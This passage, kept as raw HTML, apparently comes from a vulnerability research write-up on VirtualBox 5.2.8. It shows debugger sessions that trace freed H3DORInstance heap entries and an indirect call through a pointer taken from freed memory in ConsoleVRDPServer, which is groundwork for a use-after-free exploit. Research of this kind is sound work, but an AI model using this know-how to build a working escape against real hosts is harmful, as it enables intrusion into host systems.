class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-46\"><span class=\"crayon-cn\">0x7fb79d12dc50<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79d66a300<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79d12f080<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-47\"><span class=\"crayon-cn\">0x7fb79d12dc60<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-48\"><span class=\"crayon-cn\">0x7fb79d12dc70<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-49\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">49<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4a00<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-50\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">50<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-51\"><span class=\"crayon-cn\">0x7fb79d66a2b0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc67440<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79d12f330<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-52\"><span class=\"crayon-cn\">0x7fb79d66a2c0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-53\"><span class=\"crayon-cn\">0x7fb79d66a2d0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0003506f00010101<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-54\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">51<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4940<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-55\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">52<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-56\"><span class=\"crayon-cn\">0x7fb79cf983c0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79d12dc40<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc81400<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-57\"><span class=\"crayon-cn\">0x7fb79cf983d0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-58\"><span class=\"crayon-cn\">0x7fb79cf983e0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-59\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4ac0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-60\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">54<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-61\"><span class=\"crayon-cn\">0x7fb79d0a7430<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cf983b0<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc814f0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-62\"><span class=\"crayon-cn\">0x7fb79d0a7440<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-63\"><span class=\"crayon-cn\">0x7fb79d0a7450<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0132 seconds] -->  <\/p>\n<p>We can see that the first qword of an entry (freed) is a pointer to a previous entry (also freed) minus 0x10, i.e. is a pointer to a malloc_chunk of a previous entry. Next, we continue to break on our crucial code which is occurred in the current iteration (remember we are using unoptimized binaries compiled by us at the moment).<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f522258853861\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> gef\u27a4  b \/home\/user\/src\/VirtualBox\/src\/VBox\/Main\/src-client\/ConsoleVRDPServer.cpp:1994  Breakpoint 5 at 0x7fb7af4eb017: file \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Main\/src-client\/ConsoleVRDPServer.cpp, line 1994.  gef\u27a4  c  Continuing.    Thread 43 &#8220;VDMA&#8221; hit Breakpoint 5, ConsoleVRDPServer::H3DORVisibleRegion (H3DORInstance=0x7fb79cf983c0, cRects=0x1, paRects=0x7fb79cc7cab0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Main\/src-client\/ConsoleVRDPServer.cpp:1994  1994\t        p-&gt;pThis-&gt;m_interfaceImage.VRDEImageRegionSet (p-&gt;hImageBitmap,  gef\u27a4  x\/16i $pc  =&gt; 0x7fb7af4eb017:\tmov    rax,QWORD PTR [rbp-0x8]     0x7fb7af4eb01b:\tmov    rax,QWORD PTR [rax]     0x7fb7af4eb01e:\tmov    rax,QWORD PTR [rax+0x320]     0x7fb7af4eb025:\tmov    rdx,QWORD PTR [rbp-0x8]     0x7fb7af4eb029:\tmov    rcx,QWORD PTR [rdx+0x8]     0x7fb7af4eb02d:\tmov    rdx,QWORD PTR [rbp-0x38]     0x7fb7af4eb031:\tmov    esi,DWORD PTR [rbp-0x2c]     0x7fb7af4eb034:\tmov    rdi,rcx     0x7fb7af4eb037:\tcall   rax     0x7fb7af4eb039:\tnop     0x7fb7af4eb03a:\tleave       0x7fb7af4eb03b:\tret      gef\u27a4  si  0x00007fb7af4eb01b\t1994\t        p-&gt;pThis-&gt;m_interfaceImage.VRDEImageRegionSet (p-&gt;hImageBitmap,  gef\u27a4  x\/8gx $rax-0x10  0x7fb79cf983b0:\t0x0000000000000090\t0x0000000000000035  0x7fb79cf983c0:\t0x00007fb79d12dc40\t0x00007fb700000000  0x7fb79cf983d0:\t0x00007fb79cc7b8d0\t0x00007f0100000000  0x7fb79cf983e0:\t0x0000000000010101\t0x00000000000000e5<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-27\">27<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-1\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">home<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VirtualBox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VBox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Main<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">client<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ConsoleVRDPServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cpp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">1994<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-2\"><span class=\"crayon-i\">Breakpoint<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">at<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7af4eb017<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">home<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VirtualBox<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">5.2.8<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VBox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Main<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">client<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ConsoleVRDPServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cpp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">line<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1994.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-3\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">c<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-4\"><span class=\"crayon-v\">Continuing<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-6\"><span class=\"crayon-i\">Thread<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">43<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;VDMA&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hit <\/span><span class=\"crayon-i\">Breakpoint<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ConsoleVRDPServer<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">H3DORVisibleRegion<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">H3DORInstance<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x7fb79cf983c0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cRects<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">paRects<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x7fb79cc7cab0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">at<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">home<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VirtualBox<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">5.2.8<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VBox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Main<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">client<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ConsoleVRDPServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cpp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">1994<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-7\"><span class=\"crayon-cn\">1994<\/span><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">pThis<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">m_interfaceImage<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">VRDEImageRegionSet<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">hImageBitmap<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-8\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">16i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">pc<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-9\"><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7af4eb017<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rbp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">0x8<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-10\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb01b<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-11\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb01e<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x320<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-12\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb025<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rdx<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rbp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">0x8<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-13\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb029<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rcx<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rdx<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x8<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-14\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb02d<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rdx<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rbp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">0x38<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-15\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb031<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">esi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">DWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rbp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">0x2c<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-16\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb034<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rdi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-i\">rcx<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-17\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb037<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">call&nbsp;&nbsp; <\/span><span class=\"crayon-i\">rax<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-18\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb039<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">nop<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-19\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb03a<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">leave<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-20\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb03b<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">ret&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-21\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">si<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-22\"><span class=\"crayon-cn\">0x00007fb7af4eb01b<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">1994<\/span><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">pThis<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">m_interfaceImage<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">VRDEImageRegionSet<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">hImageBitmap<\/span><span 